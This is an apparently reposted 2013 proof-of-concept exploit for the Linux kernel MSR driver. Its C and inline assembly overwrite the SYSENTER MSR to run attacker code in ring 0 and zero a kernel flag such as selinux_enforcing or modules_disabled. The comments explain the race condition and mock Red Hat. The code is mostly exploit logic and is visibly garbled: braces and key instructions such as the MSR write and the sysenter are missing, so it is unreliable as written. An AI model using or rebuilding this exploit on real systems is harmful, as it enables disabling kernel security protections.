Linux Kernel 'MSR' Driver Local Privilege Escalation Exploit

Linux Kernel

// PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
// can do whatever in the commented area, re-enable module support, etc
// requires CONFIG_X86_MSR and just uid 0
// a small race exists between the time when the MSR is written to the first
// time and when we issue our sysenter
// we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
// configured to take a hex arg of a dword pointer to set to 0
// (modules_disabled, selinux_enforcing, take your pick)
// Hello to Red Hat, who has shown yet again to not care until a
// public exploit is released. Not even a bugtraq entry existed in
// their system until this was published -- and they have a paid team
// of how many?
// It's not as if I didn't mention the problem and existence of an easy
// exploit multiple times prior:
// spender 2013

#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/mman.h>

#define SYSENTER_EIP_MSR 0x176

u_int64_t msr;

unsigned long ourstack[65536];

u_int64_t payload_data[16];

extern void *_ring0;
extern void *_ring0_end;

void ring0(void)
__asm volatile(".globl _ring0\n"
".intel_syntax noprefix\n"
// set up stack pointer with 'ourstack'
"mov esp, ecx\n"
// save registers, contains the original MSR value
"push rax\n"
"push rbx\n"
"push rcx\n"
"push rdx\n"
// play with the kernel here with interrupts disabled!
"mov rcx, qword ptr [rbx+8]\n"
"test rcx, rcx\n"
"jz skip_write\n"
"mov dword ptr [rcx], 0\n"
// restore MSR value before returning
"mov ecx, 0x176\n" // SYSENTER_EIP_MSR
"mov eax, dword ptr [rbx]\n"
"mov edx, dword ptr [rbx+4]\n"
"pop rdx\n"
"pop rcx\n"
"pop rbx\n"
"pop rax\n"
".att_syntax prefix\n"
".global _ring0_end\n"

unsigned long saved_stack;

int main(int argc, char *argv[])
cpu_set_t set;
int msr_fd;
int ret;
u_int64_t new_msr;
struct sched_param sched;
u_int64_t resolved_addr = 0ULL;

if (argc == 2)
resolved_addr = strtoull(argv[1], NULL, 16);

/* can do this without privilege */
mlock(_ring0, (unsigned long)_ring0_end - (unsigned long)_ring0);
mlock(&payload_data, sizeof(payload_data));

CPU_SET(0, &set);

sched.sched_priority = 99;

ret = sched_setscheduler(0, SCHED_FIFO, &sched);
if (ret) {
fprintf(stderr, "Unable to set priority.\n");

ret = sched_setaffinity(0, sizeof(cpu_set_t), &set);
if (ret) {
fprintf(stderr, "Unable to set affinity.\n");

msr_fd = open("/dev/cpu/0/msr", O_RDWR);
if (msr_fd < 0) {
msr_fd = open("/dev/msr0", O_RDWR);
if (msr_fd < 0) {
fprintf(stderr, "Unable to open /dev/cpu/0/msr\n");
lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
ret = read(msr_fd, &msr, sizeof(msr));
if (ret != sizeof(msr)) {
fprintf(stderr, "Unable to read /dev/cpu/0/msr\n");

// stuff some addresses in a buffer whose address we
// pass to the "kernel" via register
payload_data[0] = msr;
payload_data[1] = resolved_addr;

printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);

lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
new_msr = (u_int64_t)(unsigned long)&_ring0;

printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);

ret = write(msr_fd, &new_msr, sizeof(new_msr));
if (ret != sizeof(new_msr)) {
fprintf(stderr, "Unable to modify /dev/cpu/0/msr\n");

__asm volatile(
".intel_syntax noprefix\n"
"mov saved_stack, esp\n"
"lea ecx, ourstack\n"
"lea edx, label2\n"
"lea ebx, payload_data\n"
"mov esp, saved_stack\n"
".att_syntax prefix\n"


return 0;